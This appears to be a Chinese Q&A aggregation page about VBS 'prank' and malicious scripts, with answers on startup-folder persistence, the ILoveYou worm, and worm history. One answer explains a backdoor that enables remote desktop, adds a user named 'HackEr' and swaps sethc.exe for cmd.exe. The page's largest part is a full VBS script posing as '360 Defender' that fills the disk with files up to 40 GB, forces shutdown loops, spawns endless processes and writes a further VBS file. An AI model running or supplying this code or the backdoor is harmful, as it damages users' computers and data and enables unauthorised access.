vbs伪装黑客代码(vbs恶意代码)
本文目录一览:
- 1、求VBS代码大神来看看 我电脑开机密码被修改了 求告诉我的密码
- 2、求高手讲解一下怎么设置整人用的vbs, 还有怎么将代码输入进文档里
- 3、VBS是什么文件???
- 4、解释下这个vbs脚本(大概意思)
- 5、网络蠕虫病毒代码分析
- 6、vbs整人代码
求VBS代码大神来看看 我电脑开机密码被修改了 求告诉我的密码
你这个不全吧,里面没有修改密码的部分
另外这种低级的东西,应该是那些学了点黑客技术的人臭显摆,U盘进winpe直接修改回去就行了。。。
那修改你密码的并不是通过这个脚本完成的,这个只是在完成修改后运行用于告知你付款信息的而已,如果不想重装又不想助长该类人的嚣张气焰的话,可通过上述方法(winpe)修改密码即可
求高手讲解一下怎么设置整人用的vbs, 还有怎么将代码输入进文档里
建议你不懂vbs的话还是少碰为好,(最起码你要学会基础)。记事本和word的话负责进去就OK了
word是无法编辑vbs的,编辑vbs是用记事本的后缀名是vbs就可以了。整人的话你就要想方设法把你的vbs文件放入启动文件夹里(当然也可以放到别的地方)其他就不多说了。
一般整人都会用到 do loop (死循环)or 关机代码
希望对你有用(纯手打)
VBS是什么文件???
VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script Edition。
用记事本就可以看到源代码。在没有语法错误的前提下,直接双击左键就可以运行。
但是要注意,因为VBS较为简单可行性强,所以很多人都喜欢利用VBS去写病毒或者整人的代码,所以在打开VBS之前要确保VBS的安全性和渠道的可信性。
任何一种文本编辑器都可以用来开发VBS, 记事本是windows系统自带的,无需专门下载安装,更方便快捷。
扩展资料:
2000年的时候,一名犯罪分子发送了题为”ILoveYou”的电邮,其中含有恶意附件LOVE-LETTER-FOR-YOU.TXT.vbs,实际上并非是文本文件而是VB脚本。
这封”爱的邮件”在全球范围感染了超过300万PC电脑用户。该恶意软件最终大获成功:成为了2002年传播最广泛的计算机病毒。
即便是最简单的恶意软件也能引起受害人的情绪反应。例如,一款典型的Skype木马病毒在受害人的联系人每次上线时,都会向他们发送”嗨”。
结果显而易见:受害人的许多好友和熟人几乎都会同步作出回复。对于有些用户而言,这种体验相当可怕,因此他们称其为”内向的人所遇到的最可怕病毒。”
事实上,该病毒在在这一问候消息中添加了网络钓鱼链接,因此向所有人说”嗨”绝不是为了好玩那么简单。但该恶意软件之所以受到广泛关注,是因为每次感染一台PC电脑都引起一场有关无用通讯的”巨大海啸”。
参考资料:人民网-五种最怪异的木马病毒:滑稽、吓人又有些奇怪
解释下这个vbs脚本(大概意思)
1.程序使用了功能强大的WMI执行命令,不过他的水平还有限,中间穿插使用了wscript.network和WScript.Shell实际上,WMI可以做任何事情.我们的系统环境中有cmd批处理环境,wscript的vbs环境,shell.application环境,还有执行hta的whta环境.它们都是什么都可以做到的.
2,具体执行的操作:
1,改写注册表3389远程桌面登录的fDenyTSConnections值.这个值,就是你在我的电脑属性里设置许可或者禁止用户远程登录的值.直接从注册表中改了.
2,把远程桌面的端口PortNumber改回为3389,以防其他意外,比如以前被人改了.那自己就登不进来.
3.使用WMI 调用("WSCRIPT.NETWORK")也就是常说的VBS环境,建立密码为393214425,用户名为HackEr的用户
4,直接使用Wscript.shell对象,打开cmd.exe 进程,执行更改sethc.exe 为asethc.exe,并复制cmd.exe 为sethc.exe
3,关于sethc.exe 复制为cmd.exe有什么用.这个程序就是连按五下shift键后出现的粘滞键程序.它的特点是既使还在用户登录界面,也可以用五下shift调出来.而且是系统权限.
这样,即使你把黑客的远程用户名删了,只要没有关远程桌面,他只要能到达远程桌面连接的框,就可以连按五下shift调出cmd.exe从而重建用户.这才是一个真正的后门.
不过他做得不够绝.做得绝的话,从注册表,把3389这个注册表项的权限设成任何人只读,不能改或者删,那么,你从我的电脑上,想关远程桌面,也关不掉了.
网络蠕虫病毒代码分析
蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其
他的计算机系统中(通常是经过网络连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。
比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。
形成原因利用漏洞主动进行攻击
此类病毒主要是“红色代码”和“尼姆亚”,以及至今依然肆虐的“求职信”等。由于IE浏览器的漏洞(IFRAMEEXECCOMMAND),使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播,SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。
传播方式多样
如“尼姆亚”病毒和”求职信”病毒,可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。
病毒制作技术新
与传统的病毒不同的是,许多新病毒是利用当前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VBScript等技术,可以潜伏在HTML页面里,在上网浏览时触发。
vbs整人代码
大量的楼上已经说了。这个是本人原创,亲测有用。毒性嘛,就是会烧CPU,然后在这个vbs旁边创建一大堆垃圾文件(请准备好30G空间)【具体在代码中】
仅供恶搞娱乐和研究,没有攻击任何人,组织的意图。
set qstart = wscript.CreateObject("wscript.shell")
set qweb = CreateObject("Wscript.Shell")
set qwrite = CreateObject("scripting.filesystemobject")
set qsay = CreateObject("sapi.spvoice")
qstart.run "D:\病毒BGM.mp3" ' 《江南皮革厂倒闭了.mp3》请准备好放在D:\
msgbox "您的电脑已被病毒入侵!",vbokonly+vbExclamation,"360 Defender"
qstart.run "cmd.exe /c start appwiz.cpl"
qstart.run "cmd.exe /c start bthprops.cpl"
qstart.run "cmd.exe /c start calc.exe"
qstart.run "cmd.exe /c start cleanmgr.exe"
qstart.run "cmd.exe /c start cmd.exe"
qstart.run "cmd.exe /c start colorcpl.exe"
qstart.run "cmd.exe /c start control.exe"
qstart.run "cmd.exe /c start cttune.exe"
qstart.run "cmd.exe /c start desk.cpl"
qstart.run "cmd.exe /c start dfrgui.exe"
qstart.run "cmd.exe /c start dxdiag.exe"
qstart.run "cmd.exe /c start FileHistory.exe"
qstart.run "cmd.exe /c start Firewall.cpl"
qstart.run "cmd.exe /c start Fondue.exe"
qstart.run "cmd.exe /c start fontview.exe"
qstart.run "cmd.exe /c start fsquirt.exe"
qstart.run "cmd.exe /c start hdwwiz.cpl"
qstart.run "cmd.exe /c start inetcpl.cpl"
qstart.run "cmd.exe /c start intl.cpl"
qstart.run "cmd.exe /c start irprops.cpl"
qstart.run "cmd.exe /c start joy.cpl"
qstart.run "cmd.exe /c start LaunchTM.exe"
qstart.run "cmd.exe /c start Magnify.exe"
qstart.run "cmd.exe /c start main.cpl"
qstart.run "cmd.exe /c start mblctr.exe"
qstart.run "cmd.exe /c start mmsys.cpl"
qstart.run "cmd.exe /c start msinfo32.exe"
qstart.run "cmd.exe /c start mspaint.exe"
qstart.run "cmd.exe /c start ncpa.cpl"
qstart.run "cmd.exe /c start notepad.exe"
qstart.run "cmd.exe /c start powercfg.cpl"
qstart.run "cmd.exe /c start RTSnMg64.cpl"
qstart.run "cmd.exe /c start SnippingTool.exe"
qstart.run "cmd.exe /c start sysdm.cpl"
qstart.run "cmd.exe /c start TabletPC.cpl"
qstart.run "cmd.exe /c start telephon.cpl"
qstart.run "cmd.exe /c start timedate.cpl"
qstart.run "cmd.exe /c start write.exe"
qstart.run "cmd.exe /c start wscript.exe"
qstart.run "cmd.exe /c start wscui.cpl"
qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"
qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"
qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"
qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"
qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"
qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"
qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"
qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"
wscript.sleep 25000
qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒:因为这个游戏涉及非法内容,所以您的电脑将在60秒后自动关机"" ",0,true
qstart.run "cmd.exe /c echo 滚|clip"
A = INPUTBOX ("说!360是不是上帝?"+chr(13)+chr(13)+chr(13)+"(“滚”已复制到剪贴板,可以粘贴。)","360 Defender","不是",8000,7000)
IF A = "是" then
qstart.run "cmd.exe /c shutdown -a",0,true
msgbox "好的,现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"
do
qweb.run""
loop
ELSEIF A = "不是" then
qstart.run "cmd.exe /c shutdown -a",0,true
msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢?",vbokonly+vbQuestion,"360 Defender"
msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"
msgbox "游戏规则:在开始后,请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉,或者点击确定,来开始游戏。",vbokonly+vbInformation,"360 Defender"
do
qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true
msgbox "取消关机",vbokonly,"360 Defender"
qstart.run "cmd.exe /c shutdown -a",0,true
qweb.run""
qweb.run""
qweb.run""
loop
ELSEIF A = "" then
qstart.run "cmd.exe /c shutdown -a",0,true
msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"
msgbox "自己探寻吧",vbokonly,"360 Defender"
do
qstart.run "cmd.exe /c shutdown -s -t 5",0,true
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd"
qstart.run "cmd.exe /c shutdown -a",0,true
loop
ELSEIF A = "滚" then
qstart.run "cmd.exe /c shutdown -a",0,true
msgbox "emmmmmmmm",vbokonly,"360 Defender"
set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)
qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)
qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)
qwriteb.close
qwrite.movefile "D:\1.txt","D:\1.vbs"
qstart.run "D:\1.vbs"
ELSE
qstart.run "cmd.exe /c shutdown -a",0,true
msgbox "由于您在说废话,但是您一定不想浪费时间说废话,所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权,决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯!",vbokonly+vbInformation,"360 Defender"
qsay.speak ("在抹掉C盘的过程中,您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qweb.run""
qstart.run "cmd.exe /c shutdown -r -t 5",0,true
END IF